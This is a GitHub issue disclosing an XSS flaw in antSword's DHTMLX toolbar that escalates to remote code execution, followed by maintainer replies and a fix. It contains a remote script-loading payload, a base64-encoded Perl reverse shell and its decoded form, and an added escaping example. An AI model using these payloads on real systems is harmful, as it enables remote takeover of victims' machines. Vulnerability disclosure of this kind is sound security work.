Report CVE RCE Vulnerability in antSword #150

Closed
zkaq opened this issue Apr 16, 2019 · 2 comments

@zkaq
commented Apr 16, 2019

1# Report CVE RCE Vulnerability in antSword

xss

The XSS in the classification directory has not been repaired, possibly because it is too weak and neglected by the authorities.

The JS substitution is obviously used here, but the authorities forgot to filter the use of single quotes, so we can take advantage of it here.

It uses the DHTMLX framework.

In the framework's DHTMLXTOOLBAR.JS file, we found the vulnerability at line 1775.

```
this.obj.innerHTML = "<input class='dhxtoolbar_input' type='text' style='width:"+this.obj.w+"px;'"+(data.value!=null?" value='"+data.value+"'":"")+">";
```

The content will be output unchanged to value `value='"+data.value+"'":"")+">";`, resulting in an XSS vulnerability.

## 0x03 Attack approach.

Building the oninput to trigger the XSS

Next, we’ll build the payload to finish the SSJI (server-side JavaScript injection).

In the end

POC: 'autofocus onfocus=alertxss;'

Payload: 'autofocus onfocus=$.getScript(unescape('http%3A%2f%2fxxx.in%2f2Yuo%0A'));'

payload:

eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3BlcmwgLWUgXCd1c2UgU 29ja2V0OyRpPSIxMjcuMC4wLjEiOyRwPTEwMDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1 NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9 pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VU LCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9iYXNoIC1pIik7fTtcJ ycsKGVycm9yLCBzdGRvdXQsIHN0ZGVycik9PnsKICAgIGFsZXJ0KGBzdGRvdXQ6ICR7c3 Rkb3V0fWApOwogIH0pOw==`,`base64`).toString())

Decoding Base64 : require('child_process').exec('perl -e 'use Socket;$i="127.0.0.1";$p=1002;socket(S,PF_INET,SOCK_STREAM,getprotoby name("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN, ">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'',(error, stdout, stderr)=>{ alert(`stdout: ${stdout}`); });
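Added example, not part of the original issue and not AntSword or DHTMLX code: the string-concatenation pattern from the quoted `innerHTML` line next to an escaped variant, with a small check that lists which attribute names the resulting tag carries. The function names and the attribute tokenizer are hypothetical, and the tokenizer is a simplification of real HTML parsing.

```javascript
// Added example; all function names here are hypothetical, not project code.

// Pattern from the issue: the value is concatenated into a single-quoted
// attribute without escaping, so a quote in the data ends the attribute.
function buildInputUnsafe(width, value) {
  return "<input class='dhxtoolbar_input' type='text' style='width:" + width + "px;'" +
    (value != null ? " value='" + value + "'" : "") + ">";
}

// Escape every character that can close an attribute value or start markup.
function escapeAttr(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;", "`": "&#96;" };
  return String(s).replace(/[&<>"'`]/g, (c) => map[c]);
}

// Hardened variant: numeric width is coerced, the value is attribute-escaped.
function buildInputSafe(width, value) {
  return "<input class='dhxtoolbar_input' type='text' style='width:" + Number(width) + "px;'" +
    (value != null ? " value='" + escapeAttr(value) + "'" : "") + ">";
}

// Simplified tokenizer for one tag: returns the attribute names a parser
// would see, including names that follow a quoted value without whitespace.
function attributeNames(tag) {
  const inner = tag.replace(/^<\w+/, "").replace(/>$/, "");
  const re = /([^\s=\/]+)(?:\s*=\s*(?:'[^']*'|"[^"]*"|[^\s]+))?/g;
  const names = [];
  let m;
  while ((m = re.exec(inner)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Regression check: untrusted data must never add attributes to the element.
function unexpectedAttributes(tag) {
  const allowed = new Set(["class", "type", "style", "value"]);
  return attributeNames(tag).filter((n) => !allowed.has(n));
}

const poc = "'autofocus onfocus=alertxss;'"; // POC string quoted in the issue
console.log("unsafe:", unexpectedAttributes(buildInputUnsafe(120, poc)));
console.log("safe:  ", unexpectedAttributes(buildInputSafe(120, poc)));
```

In a renderer with a real DOM, creating the element with `document.createElement("input")` and assigning `input.value` avoids building HTML from strings at all.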

@ViCrack

commented Apr 17, 2019

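It feels impossible to guard against everything. Do we really need to consider running encoding checks on all data obtained from the server, and then consider separately the cases where there is additional secondary-encoding processing?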

@Medicean Medicean closed this in 94f56fc Apr 17, 2019

@Medicean Medicean added the 🐛Bug label Apr 17, 2019

@Medicean

Collaborator

commented Apr 17, 2019

Thank you very much for pointing this out.

@Medicean Medicean added this to Done in AntSword-v2.1 Apr 26, 2019
